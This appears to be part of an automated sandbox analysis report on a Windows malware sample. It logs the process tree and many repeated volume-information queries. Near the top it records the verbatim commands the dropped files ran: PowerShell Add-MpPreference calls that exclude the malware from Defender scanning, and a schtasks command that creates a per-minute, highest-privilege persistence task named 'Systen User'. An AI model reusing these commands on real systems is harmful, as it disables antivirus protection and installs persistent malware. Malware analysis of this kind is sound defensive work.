                            Source: C:\Users\user\wasdwasfwasfs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\wasdwasfwasfs.exe'Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe'
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess created: C:\Users\user\adawsfaefasfasfg.exe "C:\Users\user\adawsfaefasfasfg.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess created: C:\Users\user\wasdwasfwasfs.exe "C:\Users\user\wasdwasfwasfs.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\PIN CRACKER V2.bat" "Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe'Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'adawsfaefasfasfg.exe'Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Systen User'Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Systen User'Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Systen User" /tr "C:\Users\user\AppData\Roaming\Systen User"Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\wasdwasfwasfs.exe'Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wasdwasfwasfs.exe'Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\where.exe where curlJump to behavior

                            Language, Device and Operating System Detection

                            barindex
                            Source: Yara matchFile source: C:\Users\user\wasdwasfwasfs.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\adawsfaefasfasfg.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Systen User, type: DROPPED
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeQueries volume information: C:\Users\user\Desktop\ozgpPwVAu1.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeQueries volume information: C:\Users\user\adawsfaefasfasfg.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeQueries volume information: C:\Users\user\wasdwasfwasfs.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
